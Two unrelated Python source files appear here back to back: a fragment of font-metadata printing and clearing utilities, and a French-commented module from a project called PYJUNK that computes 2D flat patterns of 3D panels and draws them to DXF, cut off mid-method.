print 'year:', font.info.year
print
def print_generic_legal(font):
print '-' * 60
print 'Generic Legal Information'
print '-' * 60
print 'copyright: %s' % font.info.copyright
print 'trademark: %s' % font.info.trademark
print
def print_generic_dimension(font):
print '-' * 60
print 'Generic Dimension Information'
print '-' * 60
print 'unitsPerEm: %s' % font.info.unitsPerEm
print 'descender: %s' % font.info.descender
print 'xHeight: %s' % font.info.xHeight
print 'capHeight: %s' % font.info.capHeight
print 'ascender: %s' % font.info.ascender
print 'italicAngle: %s' % font.info.italicAngle
print
def print_generic_miscellaneous(font):
print '-' * 60
print 'Generic Miscellaneous Information'
print '-' * 60
print 'note: %s' % font.info.note
print
def print_opentype_head(font):
print '-' * 60
print 'OpenType head Table Fields'
print '-' * 60
print 'openTypeHeadCreated: %s' % font.info.openTypeHeadCreated
print 'openTypeHeadLowestRecPPEM: %s' % font.info.openTypeHeadLowestRecPPEM
print 'openTypeHeadFlags: %s' % font.info.openTypeHeadFlags
print
def print_opentype_hhea(font):
print '-' * 60
print 'OpenType hhea Table Fields'
print '-' * 60
print 'openTypeHheaAscender: %s' % font.info.openTypeHheaAscender
print 'openTypeHheaDescender: %s' % font.info.openTypeHheaDescender
print 'openTypeHheaLineGap: %s' % font.info.openTypeHheaLineGap
print 'openTypeHheaCaretSlopeRise: %s' % font.info.openTypeHheaCaretSlopeRise
print 'openTypeHheaCaretSlopeRun: %s' % font.info.openTypeHheaCaretSlopeRun
print 'openTypeHheaCaretOffset: %s' % font.info.openTypeHheaCaretOffset
print
def print_opentype_name(font):
print '-' * 60
print 'OpenType Name Table Fields'
print '-' * 60
print 'openTypeNameDesigner: %s' % font.info.openTypeNameDesigner
print 'openTypeNameDesignerURL: %s' % font.info.openTypeNameDesignerURL
print 'openTypeNameManufacturer: %s' % font.info.openTypeNameManufacturer
print 'openTypeNameManufacturerURL: %s' % font.info.openTypeNameManufacturerURL
print 'openTypeNameLicense: %s' % font.info.openTypeNameLicense
print 'openTypeNameLicenseURL: %s' % font.info.openTypeNameLicenseURL
print 'openTypeNameVersion: %s' % font.info.openTypeNameVersion
print 'openTypeNameUniqueID: %s' % font.info.openTypeNameUniqueID
print 'openTypeNameDescription: %s' % font.info.openTypeNameDescription
print 'openTypeNamePreferredFamilyName: %s' % font.info.openTypeNamePreferredFamilyName
print 'openTypeNamePreferredSubfamilyName: %s' % font.info.openTypeNamePreferredSubfamilyName
print 'openTypeNameCompatibleFullName: %s' % font.info.openTypeNameCompatibleFullName
print 'openTypeNameSampleText: %s' % font.info.openTypeNameSampleText
print 'openTypeNameWWSFamilyName: %s' % font.info.openTypeNameWWSFamilyName
print 'openTypeNameWWSSubfamilyName: %s' % font.info.openTypeNameWWSSubfamilyName
print
def print_opentype_os2(font):
print '-' * 60
print 'OpenType OS/2 Table Fields'
print '-' * 60
print 'openTypeOS2WidthClass: %s' % font.info.openTypeOS2WidthClass
print 'openTypeOS2WeightClass: %s' % font.info.openTypeOS2WeightClass
print 'openTypeOS2Selection: %s' % font.info.openTypeOS2Selection
print 'openTypeOS2VendorID: %s' % font.info.openTypeOS2VendorID
print 'openTypeOS2Panose: %s' % font.info.openTypeOS2Panose
print 'openTypeOS2FamilyClass: %s' % font.info.openTypeOS2FamilyClass
print 'openTypeOS2UnicodeRanges: %s' % font.info.openTypeOS2UnicodeRanges
print 'openTypeOS2CodePageRanges: %s' % font.info.openTypeOS2CodePageRanges
print 'openTypeOS2TypoAscender: %s' % font.info.openTypeOS2TypoAscender
print 'openTypeOS2TypoDescender: %s' % font.info.openTypeOS2TypoDescender
print 'openTypeOS2TypoLineGap: %s' % font.info.openTypeOS2TypoLineGap
print 'openTypeOS2WinAscent: %s' % font.info.openTypeOS2WinAscent
print 'openTypeOS2WinDescent: %s' % font.info.openTypeOS2WinDescent
print 'openTypeOS2Type: %s' % font.info.openTypeOS2Type
print 'openTypeOS2SubscriptXSize: %s' % font.info.openTypeOS2SubscriptXSize
print 'openTypeOS2SubscriptYSize: %s' % font.info.openTypeOS2SubscriptYSize
print 'openTypeOS2SubscriptXOffset: %s' % font.info.openTypeOS2SubscriptXOffset
print 'openTypeOS2SubscriptYOffset: %s' % font.info.openTypeOS2SubscriptYOffset
print 'openTypeOS2SuperscriptXSize: %s' % font.info.openTypeOS2SuperscriptXSize
print 'openTypeOS2SuperscriptYSize: %s' % font.info.openTypeOS2SuperscriptYSize
print 'openTypeOS2SuperscriptXOffset: %s' % font.info.openTypeOS2SuperscriptXOffset
print 'openTypeOS2SuperscriptYOffset: %s' % font.info.openTypeOS2SuperscriptYOffset
print 'openTypeOS2StrikeoutSize: %s' % font.info.openTypeOS2StrikeoutSize
print 'openTypeOS2StrikeoutPosition: %s' % font.info.openTypeOS2StrikeoutPosition
print
def print_opentype_vhea(font):
print '-' * 60
print 'OpenType vhea Table Fields'
print '-' * 60
print 'openTypeVheaVertTypoAscender: %s' % font.info.openTypeVheaVertTypoAscender
print 'openTypeVheaVertTypoDescender: %s' % font.info.openTypeVheaVertTypoDescender
print 'openTypeVheaVertTypoLineGap: %s' % font.info.openTypeVheaVertTypoLineGap
print 'openTypeVheaCaretSlopeRise: %s' % font.info.openTypeVheaCaretSlopeRise
print 'openTypeVheaCaretSlopeRun: %s' % font.info.openTypeVheaCaretSlopeRun
print 'openTypeVheaCaretOffset: %s' % font.info.openTypeVheaCaretOffset
print
def print_postscript_data(font):
print '-' * 60
print 'PostScript Specific Data'
print '-' * 60
print 'postscriptFontName: %s' % font.info.postscriptFontName
print 'postscriptFullName: %s' % font.info.postscriptFullName
print 'postscriptSlantAngle: %s' % font.info.postscriptSlantAngle
print 'postscriptUniqueID: %s' % font.info.postscriptUniqueID
print 'postscriptUnderlineThickness: %s' % font.info.postscriptUnderlineThickness
print 'postscriptUnderlinePosition: %s' % font.info.postscriptUnderlinePosition
print 'postscriptIsFixedPitch: %s' % font.info.postscriptIsFixedPitch
print 'postscriptBlueValues: %s' % font.info.postscriptBlueValues
print 'postscriptOtherBlues: %s' % font.info.postscriptOtherBlues
print 'postscriptFamilyBlues: %s' % font.info.postscriptFamilyBlues
print 'postscriptFamilyOtherBlues: %s' % font.info.postscriptFamilyOtherBlues
print 'postscriptStemSnapH: %s' % font.info.postscriptStemSnapH
print 'postscriptStemSnapV: %s' % font.info.postscriptStemSnapV
print 'postscriptBlueFuzz: %s' % font.info.postscriptBlueFuzz
print 'postscriptBlueShift: %s' % font.info.postscriptBlueShift
print 'postscriptBlueScale: %s' % font.info.postscriptBlueScale
print 'postscriptForceBold: %s' % font.info.postscriptForceBold
print 'postscriptDefaultWidthX: %s' % font.info.postscriptDefaultWidthX
print 'postscriptNominalWidthX: %s' % font.info.postscriptNominalWidthX
print 'postscriptWeightName: %s' % font.info.postscriptWeightName
print 'postscriptDefaultCharacter: %s' % font.info.postscriptDefaultCharacter
print 'postscriptWindowsCharacterSet: %s' % font.info.postscriptWindowsCharacterSet
print
# clear info
def clear_font_info(font):
"""Clears all font information fields in the font."""
# print 'deleting font info'
clear_generic_identification(font)
clear_generic_legal(font)
clear_generic_dimension(font)
clear_generic_miscellaneous(font)
clear_opentype_head(font)
clear_opentype_hhea(font)
clear_opentype_name(font)
clear_opentype_os2(font)
clear_opentype_vhea(font)
clear_postscript_data(font)
def clear_generic_identification(font):
# print 'deleting Generic Identification Information'
font.info.familyName = None
font.info.styleName = None
font.info.styleMapFamilyName = None
font.info.styleMapStyleName = None
font.info.versionMajor = None
font.info.versionMinor = None
font.info.year = None
def clear_generic_legal(font):
# print 'deleting Generic Legal Information'
font.info.copyright = None
font.info.trademark = None
def clear_generic_dimension(font):
# print 'deleting Generic Dimension Information'
font.info.unitsPerEm = None
font.info.descender = None
font.info.xHeight = None
font.info.capHeight = None
font.info.ascender = None
font.info.italicAngle = None
def clear_generic_miscellaneous(font):
# print 'deleting Generic Miscellaneous Information'
font.info.note = None
def clear_opentype_head(font):
# print 'deleting OpenType head Table Fields'
font.info.openTypeHeadCreated = None
font.info.openTypeHeadLowestRecPPEM = None
font.info.openTypeHeadFlags = None
def clear_opentype_hhea(font):
# print 'deleting OpenType hhea Table Fields'
font.info.openTypeHheaAscender = None
font.info.openTypeHheaDescender = None
font.info.openTypeHheaLineGap = None
font.info.openTypeHheaCaretSlopeRise = None
font.info.openTypeHheaCaretSlopeRun = None
font.info.openTypeHheaCaretOffset = None
def clear_opentype_name(font):
# print 'deleting OpenType Name Table Fields'
font.info.openTypeNameDesigner = None
font.info.openTypeNameDesignerURL = None
font.info.openTypeNameManufacturer = None
font.info.openTypeNameManufacturerURL = None
font.info.openTypeNameLicense = None
font.info.openTypeNameLicenseURL = None
font.info.openTypeNameVersion = None
font.info.openTypeNameUniqueID = None
font.info.openTypeNameDescription = None
font.info.openTypeNamePreferredFamilyName = None
font.info.openTypeNamePreferredSubfamilyName = None
font.info.openTypeNameCompatibleFullName = None
font.info.openTypeNameSampleText = None
font.info.openTypeNameWWSFamilyName = None
font.info.openTypeNameWWSSubfamilyName = None
def clear_opentype_os2(font):
# print 'deleting OpenType OS/2 Table Fields'
font.info.openTypeOS2WidthClass = None
font.info.openTypeOS2WeightClass = None
font.info.openTypeOS2Selection = None
font.info.openTypeOS2VendorID = None
font.info.openTypeOS2Panose = None
font.info.openTypeOS2FamilyClass = None
font.info.openTypeOS2UnicodeRanges = None
font.info.openTypeOS2CodePageRanges = None
font.info.openTypeOS2TypoAscender = None
font.info.openTypeOS2TypoDescender = None
font.info.openTypeOS2TypoLineGap = None
font.info.openTypeOS2WinAscent = None
font.info.openTypeOS2WinDescent = None
font.info.openTypeOS2Type = None
font.info.openTypeOS2SubscriptXSize = None
font.info.openTypeOS2SubscriptYSize = None
font.info.openTypeOS2SubscriptXOffset = None
font.info.openTypeOS2SubscriptYOffset = None
font.info.openTypeOS2SuperscriptXSize = None
font.info.openTypeOS2SuperscriptYSize = None
font.info.openTypeOS2SuperscriptXOffset = None
font.info.openTypeOS2SuperscriptYOffset = None
font.info.openTypeOS2StrikeoutSize = None
font.info.openTypeOS2StrikeoutPosition = None
def clear_opentype_vhea(font):
# print 'deleting OpenType vhea Table Fields'
font.info.openTypeVheaVertTypoAscender = None
font.info.openTypeVheaVertTypoDescender = None
font.info.openTypeVheaVertTypoLineGap = None
font.info.openTypeVheaCaretSlopeRise = None
font.info.openTypeVheaCaretSlopeRun = None
font.info.openTypeVheaCaretOffset = None
def clear_postscript_data(font):
# print 'deleting PostScript Specific Data'
font.info.postscriptFontName = None
font.info.postscriptFullName = None
font.info.postscriptSlantAngle = None
font.info.postscriptUniqueID = None
font.info.postscriptUnderlineThickness = None
font.info.postscriptUnderlinePosition = None
font.info.postscriptIsFixedPitch = None
font.info.postscriptBlueValues = None
font.info.postscriptOtherBlues = None
font.info.postscriptFamilyBlues = None
font.info.postscriptFamilyOtherBlues = None
font.info.postscriptStemSnapH = None
font.info.postscriptStemSnapV = None
font.info.postscriptBlueFuzz = None
font.info.postscriptBlueShift = None
font.info.postscriptBlueScale = None
font.info.postscriptForceBold = None
font.info.postscriptDefaultWidthX = None
font.info.postscriptNominalWidthX = None
font.info.postscriptWeightName = None
font.info.postscriptDefaultCharacter = None
font.info.postscriptWindowsCharacterSet = None
|
#! /bin/env python3
# -*- coding: utf-8 -*-
################################################################################
#
# This file is part of PYJUNK.
#
# Copyright © 2021 Marc JOURDAIN
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the “Software”),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# You should have received a copy of the MIT License
# along with PYJUNK. If not, see <https://mit-license.org/>.
#
################################################################################
"""
Developp.py rassemble la définition des classes:
Developp2D
Developp(Developp2D)
"""
from __future__ import annotations
import sys
import pathlib
import math
from datetime import datetime
import Direction as di
#----- constantes pour finir le programme
NORMAL_TERMINATION = 0
ABNORMAL_TERMINATION = 1
#----- tableau (dictionnaire) pour les couleurs des tracés
couleur = {
"blanc": 0,
"rouge": 1,
"jaune": 2,
"vert": 3,
"magenta": 4,
"bleu": 5,
"violet": 6,
"gris": 8
}
#----- Classe représentant le modèle pour le calcul du développé
class Developp2D:
"""
Classe Developp2D
=================
La classe Developp2D calcule et stocke la représentation du développé, 2D par définition
:datas:
self.dictDevelopp2D: dict
self.numPanneau: int
self.lendroit2DMil: list
self.lendroit2DHaut: list
self.lendroit2DBas: list
self.lendroit2DHautChainette: list
self.lendroit2DBasChainette: list
self.lendroit2DHautCouture: list
self.endroit2DMil: Endroit2D
self.endroit2DHaut: Endroit2D
self.endroit2DBas: Endroit2D
:Example:
>>> a = Developp2D({"numPanneau": 0})
>>> print(a)
--> Developp2D :
<BLANKLINE>
.. seealso::
.. warning::
.. note::
.. todo::
"""
#-----
def __init__(self, dictDevelopp2D: dict) -> None:
self.dictDevelopp2D = dictDevelopp2D
if "numPanneau" in self.dictDevelopp2D and isinstance(self.dictDevelopp2D["numPanneau"], int):
self.numPanneau = self.dictDevelopp2D["numPanneau"]
else:
print(f'< !!!! > dictionnaire incorrect pour dictDevelopp2D')
print(f'program aborted')
sys.exit(ABNORMAL_TERMINATION)
# les listes de points 2D qui seront placés dans le dxf
self.lendroit2DMil = []
self.lendroit2DHaut = []
self.lendroit2DBas = []
self.lendroit2DHautChainette = []
self.lendroit2DBasChainette = []
self.lendroit2DHautCouture = []
# les points 2D précédents
self.endroit2DMil = None
self.endroit2DHaut = None
self.endroit2DBas = None
#-----
@staticmethod
def calc(dictCalc: dict) -> tuple:
"""
soit 2 cercles (x-a)²+(y-b)²=r0² et (x-c)²+(y-d)²=r1², on cherche les points d'intersection
la Distance entre les centres est D = sqrt[(c-a)²+(d-b)²]
la condition pour qu'il y ait une intersection :
D < r0+r1 et D > abs(r0-r1)
les solutions sont données par :
avec δ = 1/4*sqrt((D+r0+r1)(D+r0-r1)(D-r0+r1)(-D+r0+r1))
x1,2 = (a+c)/2 + (c-a)(r0²-r1²)/(2D²) +- 2δ(b-d)/D²
y1,2 = (b+d)/2 + (d-b)(r0²-r1²)/(2D²) -+ 2δ(a-c)/D²
"""
a = dictCalc["c0"]["x"]
b = dictCalc["c0"]["y"]
c = dictCalc["c1"]["x"]
d = dictCalc["c1"]["y"]
r0 = dictCalc["r0"]
r1 = dictCalc["r1"]
dD = math.hypot((c-a), (d-b))
if not (dD < (r0+r1) and dD > math.fabs(r0-r1)):
print(f'pas de solutions')
print(f'a -> {a} b -> {b} c -> {c} d -> {d} r0 -> {r0} r1 -> {r1}')
print(f' --> Arrêt du programme')
sys.exit(ABNORMAL_TERMINATION)
part1X = (a+c)/2.
part1Y = (b+d)/2.
part2 = (r0*r0-r1*r1)/(2.*dD*dD)
part2X = (c-a)*part2
part2Y = (d-b)*part2
delta = math.sqrt((dD+r0+r1)*(dD+r0-r1)*(dD-r0+r1)*(-dD+r0+r1))/(2.*dD*dD)
deltaX = (b-d)*delta
deltaY = (a-c)*delta
x = part1X + part2X
x1 = x + deltaX
x2 = x - deltaX
if x1 > x2:
return (x1, part1Y + part2Y - deltaY)
return (x2, part1Y + part2Y + deltaY)
#-----
@staticmethod
def couture(dictCouture: dict) -> tuple:
"""
Calcul de la couture sur le bord haut du développé
Principe : à partir de 2 points successifs de la chainette donc une droite,
on calcule 2 autres points décalés de fCouture et faisant un angle intérieur de angleR
avec la droite
"""
if "fCouture" in dictCouture and isinstance(dictCouture["fCouture"], float):
fCouture = dictCouture["fCouture"]
else:
print(f'< !!!! > dictionnaire incorrect pour dictCouture')
print(f'program aborted')
sys.exit(ABNORMAL_TERMINATION)
angleR = math.radians(60.) # don't try 90°
if "endroitDeb" in dictCouture and isinstance(dictCouture["endroitDeb"], di.Endroit2D):
endroitDeb = dictCouture["endroitDeb"]
else:
print(f'< !!!! > dictionnaire incorrect pour dictCouture')
print(f'program aborted')
sys.exit(ABNORMAL_TERMINATION)
if "endroitFin" in dictCouture and isinstance(dictCouture["endroitFin"], di.Endroit2D):
endroitFin = dictCouture["endroitFin"]
else:
print(f'< !!!! > dictionnaire incorrect pour dictCouture')
print(f'program aborted')
sys.exit(ABNORMAL_TERMINATION)
angleChainette = di.Direction2D(endroitFin - endroitDeb).angle2D()
direction2DDeb = di.Direction2D({"vect2D": {"x": fCouture / math.tan(angleR) , "y": fCouture}})
endroit2DCoutureDeb = endroitDeb + di.Direction2D(direction2DDeb.rot2d(angleChainette))
angleChainette = di.Direction2D(endroitDeb - endroitFin).angle2D()
direction2DFin = di.Direction2D({"vect2D": {"x": fCouture / math.tan(angleR) , "y": -fCouture}})
endroit2DCoutureFin = endroitFin + di.Direction2D(direction2DFin.rot2d(angleChainette))
return (endroit2DCoutureDeb["point2D"]["x"], endroit2DCoutureDeb["point2D"]["y"], \
endroit2DCoutureFin["point2D"]["x"], endroit2DCoutureFin["point2D"]["y"] \
)
#-----
def comp(self, dictDevelopp2D: dict) -> None:
"""
Dans l'espace 2D le calcul a
"""
if dictDevelopp2D["index"] == 0:
endroit2DMil = di.Endroit2D({"point2D": {"x": 0., "y": 0.}})
self.lendroit2DMil.append(endroit2DMil)
fdist3DMilHaut = dictDevelopp2D["fdist3DMilHaut"]
endroit2DHaut = di.Endroit2D({"point2D": {"x": 0., "y": fdist3DMilHaut}})
self.lendroit2DHaut.append(endroit2DHaut)
fdist3DMilBas = dictDevelopp2D["fdist3DMilBas"]
endroit2DBas = di.Endroit2D({"point2D": {"x": 0., "y": -fdist3DMilBas}})
self.lendroit2DBas.append(endroit2DBas)
fdist3DMilHautChainette = dictDevelopp2D["fdist3DMilHautChainette"]
endroit2DHautChainette = di.Endroit2D({"point2D": {"x": 0., "y": fdist3DMilHautChainette}})
self.lendroit2DHautChainette.append(endroit2DHautChainette)
fdist3DMilBasChainette = dictDevelopp2D["fdist3DMilBasChainette"]
endroit2DBasChainette = di.Endroit2D({"point2D": {"x": 0., "y": -fdist3DMilBasChainette}})
self.lendroit2DBasChainette.append(endroit2DBasChainette)
self.lendroit2DHautCouture.append(endroit2DHautChainette)
else:
dictCalc = {}
dictCalc['c0'] = self.endroit2DMil.p2ddict.getDict()
dictCalc["r0"] = dictDevelopp2D["fdist3DMilMil"]
dictCalc['c1'] = self.endroit2DHaut.p2ddict.getDict()
dictCalc["r1"] = dictDevelopp2D["fdist3DHautMil"]
(x, y) = Developp2D.calc(dictCalc=dictCalc)
endroit2DMil = di.Endroit2D({"point2D": {"x": x, "y": y}})
self.lendroit2DMil.append(endroit2DMil)
dictCalc['c0'] = self.endroit2DMil.p2ddict.getDict()
dictCalc["r0"] = dictDevelopp2D["fdist3DMilHaut"]
dictCalc['c1'] = self.endroit2DHaut.p2ddict.getDict()
dictCalc["r1"] = dictDevelopp2D["fdist3DHautHaut"]
(x, y) = Developp2D.calc(dictCalc=dictCalc)
endroit2DHaut = di.Endroit2D({"point2D": {"x": x, "y": y}})
self.lendroit2DHaut.append(endroit2DHaut)
dictCalc['c0'] = self.endroit2DMil.p2ddict.getDict()
dictCalc["r0"] = dictDevelopp2D["fdist3DMilBas"]
dictCalc['c1'] = self.endroit2DBas.p2ddict.getDict()
dictCalc["r1"] = dictDevelopp2D["fdist3DBasBas"]
(x, y) = Developp2D.calc(dictCalc=dictCalc)
endroit2DBas = di.Endroit2D({"point2D": {"x": x, "y": y}})
self.lendroit2DBas.append(endroit2DBas)
dictCalc['c0'] = self.endroit2DMil.p2ddict.getDict()
dictCalc["r0"] = dictDevelopp2D["fdist3DMilHautChainette"]
dictCalc['c1'] = self.endroit2DHaut.p2ddict.getDict()
dictCalc["r1"] = dictDevelopp2D["fdist3DHautHautChainette"]
(x, y) = Developp2D.calc(dictCalc=dictCalc)
endroit2DHautChainette = di.Endroit2D({"point2D": {"x": x, "y": y}})
self.lendroit2DHautChainette.append(endroit2DHautChainette)
dictCalc['c0'] = self.endroit2DMil.p2ddict.getDict()
dictCalc["r0"] = dictDevelopp2D["fdist3DMilBasChainette"]
dictCalc['c1'] = self.endroit2DBas.p2ddict.getDict()
dictCalc["r1"] = dictDevelopp2D["fdist3DBasBasChainette"]
(x, y) = Developp2D.calc(dictCalc=dictCalc)
endroit2DBasChainette = di.Endroit2D({"point2D": {"x": x, "y": y}})
self.lendroit2DBasChainette.append(endroit2DBasChainette)
dictCouture = {}
dictCouture["endroitDeb"] = self.lendroit2DHautChainette[-2]
dictCouture["endroitFin"] = self.lendroit2DHautChainette[-1]
dictCouture["fCouture"] = dictDevelopp2D["fCouture"]
(x1, y1, x2, y2) = Developp2D.couture(dictCouture=dictCouture)
endroit2DHautCouture = di.Endroit2D({"point2D": {"x": x1, "y": y1}})
self.lendroit2DHautCouture.append(endroit2DHautCouture)
endroit2DHautCouture = di.Endroit2D({"point2D": {"x": x2, "y": y2}})
self.lendroit2DHautCouture.append(endroit2DHautCouture)
#self.lendroit2DHautCouture.append(self.lendroit2DHautChainette[-1])
self.endroit2DMil = self.lendroit2DMil[-1]
self.endroit2DHaut = self.lendroit2DHaut[-1]
self.endroit2DBas = self.lendroit2DBas[-1]
#-----
def horiz(self) -> None:
"""
tout les points du panneau sont tournés pour être mis
à "l'horizontale" définie par l'axe du millieu du panneau
"""
alpha = di.Direction2D(self.lendroit2DMil[-1] - self.lendroit2DMil[0]).angle2D()
lendroit2DMil = []
lendroit2DHaut = []
lendroit2DBas = []
lendroit2DHautChainette = []
lendroit2DBasChainette = []
lendroit2DHautCouture = []
for i in self.lendroit2DMil:
lendroit2DMil.append(i.rot2d(fAth=-alpha))
for i in self.lendroit2DHaut:
lendroit2DHaut.append(i.rot2d(fAth=-alpha))
for i in self.lendroit2DBas:
lendroit2DBas.append(i.rot2d(fAth=-alpha))
for i in self.lendroit2DHautChainette:
lendroit2DHautChainette.append(i.rot2d(fAth=-alpha))
for i in self.lendroit2DBasChainette:
lendroit2DBasChainette.append(i.rot2d(fAth=-alpha))
for i in self.lendroit2DHautCouture:
lendroit2DHautCouture.append(i.rot2d(fAth=-alpha))
self.lendroit2DMil = lendroit2DMil
self.lendroit2DHaut = lendroit2DHaut
self.lendroit2DBas = lendroit2DBas
self.lendroit2DHautChainette = lendroit2DHautChainette
self.lendroit2DBasChainette = lendroit2DBasChainette
self.lendroit2DHautCouture = lendroit2DHautCouture
#-----
def createDxf(self, block) -> None:
"""
la mise en place du dxf
"""
# la ligne millieu en pointillé
polyLineMil = block.add_lwpolyline([], dxfattribs={'color': couleur["jaune"], 'linetype': 'DOT2'})
for i in self.lendroit2DMil:
polyLineMil.append_points(points=[(i["point2D"]["x"], \
i["point2D"]["y"])], \
format='xy')
# la ligne du haut en pointillé
polyLineHaut = block.add_lwpolyline([], dxfattribs={'color': couleur["jaune"], 'linetype': 'DOT2'})
for i in self.lendroit2DHaut:
polyLineHaut.append_points(points=[(i["point2D"]["x"], \
i["point2D"]["y"])], \
format='xy')
# la ligne du haut de chainette en plein
polyLineHautChainette = block.add_lwpolyline([], dxfattribs={'color': couleur["bleu"]})
for i in self.lendroit2DHautChainette:
polyLineHautChainette.append_points(points=[(i["point2D"]["x"], \
i["point2D"]["y"])], \
format='xy')
# la ligne du bas en pointillé
polyLineBas = block.add_lwpolyline([], dxfattribs={'color': couleur["jaune"], 'linetype': 'DOT2'})
for i in self.lendroit2DBas:
polyLineBas.append_points(points=[(i["point2D"]["x"], \
i["point2D"]["y"])], \
format='xy')
# la ligne du bas de chainette en plein
polyLineBasChainette = block.add_lwpolyline([], dxfattribs={'color': couleur["bleu"]})
for i in self.lendroit2DBasChainette:
polyLineBasChainette.append_points(points=[(i["point2D"]["x"], \
i["point2D"]["y"])], \
format='xy')
# la ligne de la couture en plein
polyLineHautCouture = block.add_lwpolyline([], dxfattribs={'color': couleur["bleu"]})
for i in self.lendroit2DHautCouture:
polyLineHautCouture.append_points(points=[(i["point2D"]["x"], \
i["point2D"]["y"])], \
format='xy')
# les lignes de section (la première et la dernière sont différentes)
for i in range(len(self.lendroit2DBasChainette)):
if i == 0 or i == len(self.lendroit2DBasChainette)-1:
polyLineSection = block.add_lwpolyline([], dxfattribs={'color': couleur["bleu"]})
else:
polyLineSection = block.add_lwpolyline([], dxfattribs={'color': couleur["rouge"], 'lineweight': 20})
polyLineSection.append_points(points=[(self.lendroit2DBasChainette[i]["point2D"]["x"], \
self.lendroit2DBasChainette[i]["point2D"]["y"])], \
format='xy')
polyLineSection.append_points(points=[(self.lendroit2DHautChainette[i]["point2D"]["x"], \
self.lendroit2DHautChainette[i]["point2D"]["y"])], \
format='xy')
# une inscription du numéro de panneau
endroit2DDeb = di.Endroit2D(self.lendroit2DHaut[0])
endroit2DFin = di.Endroit2D(self.lendroit2DHaut[-1])
intHautText = di.Endroit2D(endroit2DDeb.lin2d(k=0.97, endroit2D=endroit2DFin))
endroit2DDeb = di.Endroit2D(self.lendroit2DBas[0])
endroit2DFin = di.Endroit2D(self.lendroit2DBas[-1])
intBasText = di.Endroit2D(endroit2DDeb.lin2d(k=0.97, endroit2D=endroit2DFin))
debText = intHautText.lin2d(k=0.55, endroit2D=intBasText)
finText = intHautText.lin2d(k=0.45, endroit2D=intBasText)
panneauNum = f'<-- bas Panneau numéro : {self.numPanneau} (chute) haut -->'
block.add_text(panneauNum, \
dxfattribs={'style': 'OpenSansCondensed-Bold'} \
).set_pos([debText["point2D"]["x"], debText["point2D"]["y"]], \
[finText["point2D"]["x"], finText["point2D"]["y"]], \
align='ALIGNED')
# une inscription sur la chute
endroit2DDeb = di.Endroit2D(self.lendroit2DMil[0])
endroit2DFin = di.Endroit2D(self.lendroit2DMil[-1])
debText = endroit2DDeb.lin2d(k=0.10, endroit2D=endroit2DFin)
finText = endroit2DDeb.lin2d(k=0.15, endroit2D=endroit2DFin)
copyRight = f'Créé par Pyjunk le {datetime.utcnow():%c} UTC±00:00'
block.add_text(copyRight, \
dxfattribs={'style': 'OpenSansCondensed-Bold'} \
).set_pos([debText["point2D"]["x"], debText["point2D"]["y"]], \
[finText["point2D"]["x"], finText["point2D"]["y"]], \
align='ALIGNED')
#-----
def __str__(self) -> str:
strMsg = f'--> Developp2D :\n'
return strMsg
#----- Classe représentant le développé d'un panneau
class Developp(Developp2D):
"""
Classe Developp
===============
La classe Developp représente la partie 3D du calcul de développé
:datas:
self.dictDevelopp: dict
self.endroit3DMil: Endroit3D
self.endroit3DHaut: Endroit3D
self.endroit3DBas: Endroit3D
:Example:
>>> a = Developp({"numPanneau": 0})
>>> print(a)
--> Developp :
<BLANKLINE>
.. seealso::
.. warning::
.. note::
.. todo::
"""
#-----
def __init__(self, dictDevelopp: dict) -> None:
self.dictDevelopp = dictDevelopp
# les anciens points 3D
self.endroit3DMil = None
self.endroit3DHaut = None
self.endroit3DBas = None
Developp2D.__init__(self, dictDevelopp2D=self.dictDevelopp)
#-----
def comp(self, dictDevelopp: dict) -> None:
"""
La stratégie pour calculer les différents points du développé est simple.
Ici on est dans l'espace 3D, dans la fonction hérité on est dans l'espace 2D.
Le principe : en 3D, on mesure les distances du point recherché par rapport à
2 autres points, on reporte ces distances en 2D à partir de 2 autres points 2D
pour trouver le point 2D sur le développé
"""
if "dictBas" in dictDevelopp and isinstance(dictDevelopp["dictBas"], dict):
endroit3DBas = di.Endroit3D(dictDevelopp["dictBas"])
else:
print(f'< !!!! > dictionnaire incorrect pour dictDevelopp')
print(f'program aborted')
sys.exit(ABNORMAL_TERMINATION)
if "dictHaut" in dictDevelopp and isinstance(dictDevelopp["dictHaut"], dict):
endroit3DHaut = di.Endroit3D(dictDevelopp["dictHaut"])
else:
print(f'< !!!! > dictionnaire incorrect pour dictDevelopp')
print(f'program aborted')
sys.exit(ABNORMAL_TERMINATION)
if "dictMil" in dictDevelopp and isinstance(dictDevelopp["dictMil"], dict):
endroit3DMil = di.Endroit3D(dictDevelopp["dictMil"])
else:
print(f'< !!!! > dictionnaire incorrect pour dictDevelopp')
print(f'program aborted')
sys.exit(ABNORMAL_TERMINATION)
if "frac" in dictDevelopp and isinstance(dictDevelopp["frac"], float):
frac = dictDevelopp["frac"]
else:
print(f'< !!!! > dictionnaire incorrect pour dictDevelopp')
print(f'program aborted')
sys.exit(ABNORMAL_TERMINATION)
if "index" in dictDevelopp and isinstance(dictDevelopp["index"], int):
index = dictDevelopp["index"]
else:
print(f'< !!!! > dictionnaire incorrect pour dictDevelopp')
print(f'program aborted')
sys.exit(ABNORMAL_TERMINATION)
if "fCouture" in dictDevelopp and isinstance(dictDevelopp["fCouture"], float):
fCouture = dictDevelopp["fCouture"]
else:
print(f'< !!!! > dictionnaire incorrect pour dictDevelopp')
print(f'program aborted')
sys.exit(ABNORMAL_TERMINATION)
# on charge un dictDevelopp2D
dictDevelopp2D = {}
dictDevelopp2D["index"] = index
dictDevelopp2D["fCouture"] = fCouture
if index == 0:
# au premier tour on ne préoccupe pas de mil qui est (0, 0) par définition
# on s'intéresse uniquement à haut, bas, hautchainette, baschainette
dictDevelopp2D["fdist3DMilHaut"] = endroit3DMil.dist3d(endroit3DHaut)
